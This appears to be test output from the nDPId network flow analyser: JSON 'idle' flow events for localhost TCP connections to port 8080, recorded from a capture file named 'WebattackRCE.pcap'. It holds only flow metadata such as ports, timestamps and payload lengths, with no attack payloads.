00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
